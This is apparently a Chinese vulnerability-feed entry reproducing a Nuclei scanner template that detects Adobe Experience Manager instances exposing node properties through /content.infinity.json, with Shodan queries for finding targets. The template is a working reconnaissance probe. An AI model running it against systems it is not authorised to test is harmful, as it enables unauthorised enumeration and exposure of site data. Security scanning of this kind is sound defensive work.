aem-dump-contentnode: AEM Dump Content Node Properties

日期: 2025-08-01 | 影响软件: AEM Dump Content Node | POC: 已公开

漏洞描述

Node Properties are exposed in AEM Dump.

PoC代码[已公开]

id: aem-dump-contentnode

info:
  name: AEM Dump Content Node Properties
  author: DhiyaneshDK
  severity: medium
  description: Node Properties are exposed in AEM Dump.
  reference:
    - https://www.slideshare.net/0ang3el/hacking-aem-sites
  classification:
    cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: adobe
    product: experience_manager_cloud_service
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: misconfig,aem,adobe,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/content.infinity.json"
      - "{{BaseURL}}/{{path}}"

    iterate-all: true

    extractors:
      - type: json
        part: body
        name: path
        json:
          - '.[]'
        internal: true
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"rep:privileges":['

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206448b9ded26c146c52debfac8b0f34858fb81132bc09156e84684fd6f2b6ea3e022100ff01fae576774c34fdd93b619b7cbafa4b5f7b92028409c517b24dd45fdb9af6:922c64590222798bb761d5b6d8e72950